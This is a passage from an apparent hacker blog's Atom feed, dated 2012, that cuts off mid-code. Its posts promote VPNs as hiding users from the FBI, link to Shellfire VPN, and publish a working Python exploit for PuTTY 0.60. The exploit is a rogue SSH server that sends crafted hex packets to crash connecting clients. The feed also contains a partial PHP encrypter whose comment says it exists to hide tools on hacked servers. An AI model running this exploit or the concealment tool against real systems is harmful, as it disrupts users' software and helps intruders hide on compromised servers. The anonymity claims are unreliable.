href='http://blackburnhacker.blogspot.com/2012/01/security-video-sites.html' title='Security Video [site&apos;s]'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-4063352839863005289</id><published>2012-01-29T01:54:00.000+06:00</published><updated>2012-01-29T01:54:02.269+06:00</updated><title type='text'>FREE vpn [100% anonym]</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;"&gt;Hi.&lt;/span&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;span style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;"&gt;i would like to share this with you.&lt;/span&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;span style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;"&gt;ItsHidden offre free and paid vpn acces.&lt;/span&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;span style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;"&gt;im talking about the free acces.&lt;/span&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;span style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;"&gt;unlike proxy , its REALY anonym and the GRC ( canada ) or FBI can't find you , and a big way faster then proxy ( who's know VPN can tell you ).&lt;/span&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;span style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;"&gt;the site&lt;/span&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;a class="bbc_url" href="http://itshidden.com/" rel="nofollow external" style="background-color: #1a1a1a; color: #ffb74c; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" title="External link"&gt;http://itshidden.com/&lt;/a&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;span style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;"&gt;the link to register a free account&lt;/span&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;a class="bbc_url" href="http://itshidden.com/index.php?option=com_acctexp&amp;amp;task=subscribe&amp;amp;Itemid=" rel="nofollow external" style="background-color: #1a1a1a; color: #ffb74c; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" title="External link"&gt;http://itshidden.com...bscribe&amp;amp;Itemid=&lt;/a&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;span style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;"&gt;so thats it for now.&amp;nbsp; my&amp;nbsp; first contributuin&amp;nbsp;&lt;/span&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;span style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;"&gt;enjoy&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-4063352839863005289?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/4063352839863005289/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/free-vpn-100-anonym.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/4063352839863005289'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/4063352839863005289'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/free-vpn-100-anonym.html' title='FREE vpn [100% anonym]'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-1345163094868915267</id><published>2012-01-29T01:47:00.002+06:00</published><updated>2012-01-29T01:47:47.785+06:00</updated><title type='text'>Shellfire VPN</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;&lt;pre class="prettyprint" style="background-attachment: initial; background-clip: initial; background-color: #1a1a1a; background-image: initial; background-origin: initial; border-bottom-color: rgb(59, 59, 59); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(59, 59, 59); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(59, 59, 59); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(59, 59, 59); border-top-style: solid; border-top-width: 1px; color: #bcbcbc; font-size: 11px; line-height: 18px; overflow-x: auto; overflow-y: auto; padding-bottom: 8px; padding-left: 8px; padding-right: 8px; padding-top: 8px; text-align: -webkit-auto;"&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;https&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;:&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;//www.shellfire.net/vpn/&lt;/span&gt;&lt;/pre&gt;&lt;br style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;" /&gt;&lt;span style="background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; text-align: -webkit-auto;"&gt;Great tool&amp;nbsp;&lt;/span&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-1345163094868915267?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/1345163094868915267/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/shellfire-vpn.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/1345163094868915267'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/1345163094868915267'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/shellfire-vpn.html' title='Shellfire VPN'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-8902174669647068940</id><published>2012-01-29T01:42:00.002+06:00</published><updated>2012-01-29T01:42:38.712+06:00</updated><title type='text'>putty 0.60 Denial Of Service (DOS)</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;&lt;table style="-webkit-border-horizontal-spacing: 0px; -webkit-border-vertical-spacing: 0px; background-color: #1a1a1a; color: #bcbcbc; font-family: tahoma, helvetica, arial, sans-serif; font-size: 12px; line-height: 19px; width: 912px;"&gt;&lt;tbody&gt;&lt;tr id="p80136"&gt;&lt;td class="code" id="p8013code6" style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 3px; padding-left: 3px; padding-right: 3px; padding-top: 3px;"&gt;&lt;pre class="windows" style="padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;print "n" &lt;br /&gt;print "----------------------------------------------------------------" &lt;br /&gt;print "| putty 0.60 Null Ptr                                           |" &lt;br /&gt;print "| Level Smash the Stack                                         |" &lt;br /&gt;print "----------------------------------------------------------------" &lt;br /&gt;print "n"&lt;br /&gt;&amp;nbsp;import sys, socket, binascii&lt;br /&gt;HOST = sys.argv[1]&lt;br /&gt;PORT = 22&lt;br /&gt;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)&lt;br /&gt;s.bind((HOST, PORT))&lt;br /&gt;s.listen(1)&lt;br /&gt;conn, addr = s.accept()&lt;br /&gt;buf = [&lt;br /&gt; ("5353482d322e302d57654f6e6c79446f20322e312e330d0a"),&lt;br /&gt; ("000001ec0a14b940c70d1910a6effb0e2228c49c0042000000366469666669652d68656c6c6d616"&lt;br /&gt; "e2d67726f7570312d736861312c6469666669652d68656c6c6d616e2d67726f757031342d7368613"&lt;br /&gt; "10000000f3f407d89a1f204f37373682d647373000000826165733132382d6362632c336465732d6"&lt;br /&gt; "362632c626c6f77666973682d6362632c6165733139322d6362632c6165733235362d6362632c726"&lt;br /&gt; "96a6e6461656c3132382d6362632c72696a6e6461afb93139322d6362632c72696a6e6461656c323"&lt;br /&gt; "5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73650000008261657"&lt;br /&gt; "33132382d6362632c336465732d6362632c626c6f77666973682db1fc632c6165733139322d63626"&lt;br /&gt; "32c6165733235362d6362632c72696a6e6461656c3132382d6362632c72696a6e6461656c3139322"&lt;br /&gt; "d6362632c72696a6e6461656c3235362d6362632c72696a6e6461656c2d636263406c797361746f7"&lt;br /&gt; "22e6c69752e736500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6"&lt;br /&gt; "d64352c6e6f6e6500000024686d61632d736861312c686d61632d736861312d39362c686d61632d6"&lt;br /&gt; "d64352c6e6f6e65000000097a6c69622c6e6f6e65000000097a6c69622c6e6f6e650000000000000"&lt;br /&gt; "111001111111111111111111111111111"), ## The 00 controls the crash&lt;br /&gt; ("0000023c091f00000095000000077373682d72736100000001230000008100d207286d90ff369d3"&lt;br /&gt; "64d9e3606ff18d6162088b426894f6216ca7709f7faa22d2e32065064d9c899a687746f3197fcc3c"&lt;br /&gt; "76d8cc643afdf14ba36252516f2b8b9ff3b131645f22bfd5f4b0b980acb4985e1c73bc3248559edd"&lt;br /&gt; "85fc2435d79e10462e1b662161e12fbc515a20a22ddd8901a1b5a231867d8f34d2196bfa01ddc5b0"&lt;br /&gt; "000010100847a283aff19a2abfe32490a2a941179c0c8076ab32421040d3ae88e6086049b53a9b97"&lt;br /&gt; "3967991ed7625dd05c85a54b4067d9e9941506158b9927002e71b84630f445eac743cf6050c5b43d"&lt;br /&gt; "a22cb8b7f559bb6f425c190b026e790f6924bf2d677f433674d1e31b71acc224c1c5979416f8f06a"&lt;br /&gt; "f70e92559b53ca23b82c852ec67ad35380e0d14ae96681bc4bddd3f73204cfc43b981fae94537a15"&lt;br /&gt; "3766aecd1ad963de610210b37f871b4b2939c934115ee3798062747bc22af375ba14b68077757bf3"&lt;br /&gt; "b45edf6ee8998f6f33a25092cb7789eb08c77cc2f26fb9507dad63f4a077cb5af5dbf248facde1ca"&lt;br /&gt; "75f95e84d4b2786fe9799dc20e9195853628132b40000008f000000077373682d727361000000804"&lt;br /&gt; "20087d6c6d46453e1bd004c715ced8814674435d48cb897e5141c03f15af86d93ac98a3376d963bc"&lt;br /&gt; "6915b98f7157418a9e0cef85a66b1ba855782848b9ae9e5a83ae051ee298299b27056020c4598045"&lt;br /&gt; "ae6eb61f5b2537adb07fa2e7733ab83907d9c61eb11f237f8e0b4a51b544687a4eec2a1be2a1dcbf"&lt;br /&gt; "cac4453d629a47d000000000000000000"),&lt;br /&gt; ("0000000c0a15a1640000c32700008e14")&lt;br /&gt; ]&lt;br /&gt;&amp;nbsp;&amp;nbsp;i = 0&lt;br /&gt;for i in range(0,len(buf)):&lt;br /&gt;    conn.send(binascii.unhexlify(buf[i]))&lt;br /&gt;    i+=1&lt;br /&gt;conn.close()&lt;br /&gt;s.close()&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;i&gt;©2011, copyright BLACK BURN &lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3436039399135336524-8902174669647068940?l=blackburnhacker.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blackburnhacker.blogspot.com/feeds/8902174669647068940/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/putty-060-denial-of-service-dos.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/8902174669647068940'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3436039399135336524/posts/default/8902174669647068940'/><link rel='alternate' type='text/html' href='http://blackburnhacker.blogspot.com/2012/01/putty-060-denial-of-service-dos.html' title='putty 0.60 Denial Of Service (DOS)'/><author><name>BLACK BURN</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='23' src='http://1.bp.blogspot.com/-SR_drEwbtZo/TuMR75ysztI/AAAAAAAAAPQ/TrGf6O0MM04/s220/Best2.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3436039399135336524.post-5677357913883300366</id><published>2012-01-29T01:35:00.001+06:00</published><updated>2012-01-29T01:35:23.284+06:00</updated><title type='text'>PHP Crypt</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;br /&gt;&lt;pre class="prettyprint" style="background-attachment: initial; background-clip: initial; background-color: #1a1a1a; background-image: initial; background-origin: initial; border-bottom-color: rgb(59, 59, 59); border-bottom-style: solid; border-bottom-width: 1px; border-image: initial; border-left-color: rgb(59, 59, 59); border-left-style: solid; border-left-width: 1px; border-right-color: rgb(59, 59, 59); border-right-style: solid; border-right-width: 1px; border-top-color: rgb(59, 59, 59); border-top-style: solid; border-top-width: 1px; color: #bcbcbc; font-size: 11px; line-height: 18px; overflow-x: auto; overflow-y: auto; padding-bottom: 8px; padding-left: 8px; padding-right: 8px; padding-top: 8px; text-align: -webkit-auto;"&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;&amp;lt;?&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;php&lt;br /&gt;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;/************************************************&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; PHP SOURCE CODE ENCRYPTER&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;BY &lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; ReZEN of XORCREW&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;WHAT IT DOES:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Takes ANY php source file and encrypts it. &amp;nbsp;You&lt;br /&gt;&lt;br /&gt;take the encrypter give it a file it then &lt;br /&gt;&lt;br /&gt;encrypts the file and spits out a new file with&lt;br /&gt;&lt;br /&gt;the encrypted source. &amp;nbsp;When you try to access&lt;br /&gt;&lt;br /&gt;the new file your asked for a username and pass.&lt;br /&gt;&lt;br /&gt;You can use ANY username you want but the pass&lt;br /&gt;&lt;br /&gt;has to be the same password you used to encrypt it&lt;br /&gt;&lt;br /&gt;if you give it the right pass it then decrypts the &lt;br /&gt;&lt;br /&gt;file and you are able to access it. &amp;nbsp;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;WHY YOUD USE IT:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;You would use this to hide any PHP tools on the&lt;br /&gt;&lt;br /&gt;server that you&amp;amp;#39;ve hacked that you don&amp;amp;#39;t want &lt;br /&gt;&lt;br /&gt;other hackers to have access to. &amp;nbsp;You could also&lt;br /&gt;&lt;br /&gt;use it to encrypt an entire forum so incase you do &lt;br /&gt;&lt;br /&gt;get hacked theyd have to know the password to even&lt;br /&gt;&lt;br /&gt;get to the config files. &amp;nbsp;Anyways its just a cool &lt;br /&gt;&lt;br /&gt;tool.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;HAPPY VALENTINES DAY TO ALL MY VALENTINES BITCHES:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;************************************************/&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;if&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(!&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;isset&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$_POST&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;[&amp;amp;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;#39;submit&amp;amp;#39;])){&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;echo &amp;nbsp;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;&amp;amp;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;#39;&amp;lt;table&amp;gt;&amp;lt;form action="&amp;amp;#39;.$PHP_SELF.&amp;amp;#39;" method="post"&amp;gt;&amp;amp;#39;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;.&amp;amp;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;#39;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;&amp;lt;b&amp;gt;File:&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;input name="file" type="text" size="38"&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;amp;#39;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;.&amp;amp;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;#39;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;&amp;lt;b&amp;gt;Password For File:&amp;lt;/b&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;td&amp;gt;&amp;lt;input name="auth" type="password" size="38"&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;amp;#39;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;.&amp;amp;&lt;/span&gt;&lt;span class="com" style="color: rgb(233, 195, 239) !important;"&gt;#39;&amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;&amp;lt;input type="submit" name="submit" value="Encrypt It!"&amp;gt;&amp;lt;/form&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;&amp;amp;#39;;&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;}&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;else&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;{&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;function&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; easy_crypt&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$string&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $key&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;){&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;$iv_size &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; mcrypt_get_iv_size&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;MCRYPT_BLOWFISH&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; MCRYPT_MODE_CBC&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;);&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;$iv &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; mcrypt_create_iv&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$iv_size&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; MCRYPT_DEV_URANDOM&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;);&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;$string &lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;=&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; mcrypt_encrypt&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;MCRYPT_BLOWFISH&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $key&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; $string&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; MCRYPT_MODE_CBC&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;,&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; $iv&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;);&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;span class="kwd" style="color: rgb(205, 234, 173) !important;"&gt;return&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; array&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;base64_encode&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt;$string&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;),&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 220, 233) !important;"&gt; base64_encode&lt;/span&gt;&lt;span class="pun" style="color: rgb(205, 232, 177) !important;"&gt;(&lt;/span&gt;&lt;span class="pln" style="color: rgb(166, 